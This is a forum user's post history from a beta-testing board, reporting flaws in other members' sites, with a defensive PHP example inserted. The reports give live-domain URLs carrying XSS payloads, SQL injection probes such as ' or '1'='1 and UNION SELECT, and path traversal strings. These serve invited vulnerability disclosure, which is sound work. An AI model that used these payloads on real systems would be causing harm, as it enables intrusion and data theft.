source (Members) · Posts: 100 · Last visited: Never
Everything posted by source
-
released my third beta, online music storage and playback
source replied to s0c0's topic in Beta Test Your Stuff!
http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=759&dir=131-lol-bc49eb
also you can xss the uid field:
http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=%3Cscript%3Ealert(1);%3C/script%3E
-
I'll tell you... disallowing registration if they have registered from that IP previously is dumb. people have IPs that change and other people use them... etc... and besides my sister/brother may want to play
-
you don't need to strip just < and > because I'm sure you can bypass that.... (depending on how it's parsed afaik) and just use strip tags...
-
I register a nick with html code. I create page with html code. disabling javascript for making a page w/ price == creates page with code as price (I think that's what happened)
-
yeah, and just what I meant was I was able to get it to spit out HTML code on the page.
-
I just got a vector. Not sure I think I made a page, went to edit it, and then changed the edit page to "><marquee>ownd... it spit out some html code.. after I clicked submit
http://www.fast.st/zapwiki/demo/index.php?p=code.skin
wow. I just realized... you allowed us to edit the skin of every user and page????
-
good job on the forums. 2 things I noticed.
1) when you view the members page you notice that there are two members named testuser...
2) I can not register, it says "passwords" do not match and they do
-
php man I didn't call it hacking. I told you what I found.
-
http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd&action=source
creating a page with code works.
http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd
-
AH sorry man I forgot since it was soo long... And ok about the URL tho I find that very annoying. (just an opinion)
-
re-read my post... I said "when registering" and uhm... not to start flame war but what does learning php have to do with javascript? It's completely unfiltered input (the email when I view the source of the page of my profile.)
-
use javascript to check shit == dumb... on register I was able to register with my email as <script>alert(1);</scritpt> etc. and <marquee>ownd.
-
http://www.sentry.dreamhosters.com/index.php?action=posts&forum=1&id=%22%3E
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE topic_id='\">'' at line 1
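The two reports just above (an email field that is echoed back unfiltered, and an `id` value that breaks the SQL statement) both come down to server-side validation, output encoding and bound query parameters. The following is an added example, not part of the original posts or of any tested site's code; the `topics` table, the function names and the sample values are constructed for illustration, and it assumes PHP with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Constructed inputs, modelled on the values quoted in the posts above.
$email = '<script>alert(1);</script>';
$id    = '">';

// Server-side check: it runs whatever the browser's JavaScript did or did not do.
function valid_email(string $raw): ?string
{
    $ok = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}

// Encode at output time so stored markup renders as text, also inside attributes.
function h(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reject non-integer ids, then bind the value instead of concatenating it into SQL.
function find_topic(PDO $db, string $rawId): ?array
{
    $topicId = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($topicId === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT topic_id, title FROM topics WHERE topic_id = :id');
    $stmt->bindValue(':id', $topicId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical schema in an in-memory SQLite database, so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE topics (topic_id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO topics (topic_id, title) VALUES (1, 'Welcome')");

var_dump(valid_email($email));
echo '<input name="email" value="', h($email), '">', PHP_EOL;
var_dump(find_topic($db, $id));
var_dump(find_topic($db, '1'));
```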
-
http://www.fast.st/zapwiki/welcome/index.php?p=solutions.tips
xss vuln when submitting a tip and having the url the same the whole time is rather annoying and does nothing to stop attacks on your site. logging out does not work.
-
uhm how can we test anything if we keep getting permission denied to even make a page?
-
no? I'm getting a fatal error message and need to make a new account.
-
yeah I know/knew but I had *nothing else to do... but today at least there was a couple sites to look at.
-
http://www.babble-net.com/?action=ViewBoard&id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
errors... and wtf you have some funky crap going on... I go to try and exploit it and I get some weird ass error and can not look @ forums anymore, unless I make a new account
http://www.babble-net.com/?action=ViewThread&id=48&pid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
1) xss
2) uhm wtf is up with your sql ?
http://www.babble-net.com/?action=ViewThread&id=48&pid=1973638458
(notice: I posted it as a blank user... hmm.. lemme try changing name to admin)
start using sessions for *EVERYTHING*... I change my cookie (get some error) and lawl @ it because it doesn't do anything...
-
I registered the nick "<marquee>shit" and it works...
http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=\%22%3E%3Cmarquee%3Eownd%20bitch
omfg tooo many xss/holes...
http://blokdudez.110mb.com/forum/make_topic.php?path=../../
path disclosure. messages == xssable... fix the holes then try again, and use DB instead of w/e you are currently doing.
http://blokdudez.110mb.com/forum/show_post.php?cat=../../
-
http://espsoftwaresolutions.com/admin/admin.php?page=1
and this I was prompted with a login (which had the username and pass there IDK if it was supposed to) it's vulnerable to all sorts of nasty stuff.
http://espsoftwaresolutions.com/admin/moreinfo.php?id=-1
Full path disclosure.
http://espsoftwaresolutions.com/tsupport/
-
http://espsoftwaresolutions.com/core/1-forum.html
I can modify (edit) anyone's post.
-
http://espsoftwaresolutions.com/core/blogger.php?uname='%20or%20'1'='1
errorz
http://espsoftwaresolutions.com/core/blogger.php?action=delete&blog_id=%22%3E%3Cscript%3Ealert(%22source%20r%201337%22);%3C/script%3E
http://espsoftwaresolutions.com/core/blogger.php?blogid="><marquee>ownd
http://espsoftwaresolutions.com/core/blogger.php?action=comment&blog_id=4&commentto=%22%3E%3Cmarquee%3Eownd
http://espsoftwaresolutions.com/core/messenger.php?action=reply&message_id=28
Not an exploit but at the bottom there is the delete and reply options, but are php variables but the value of them is not shown.
-
if that's your store you have a sql injection vuln
hub.php?hid=10%20UNION%20SELECT%20null,null,null,null
oh, and here:
http://outsidehub.com/ohub_out.php?aout='%20or%20'1'='1
4 columns am I right?
-
I meant for example I could edit index.php...
-
directory /home/test/ is still viewable...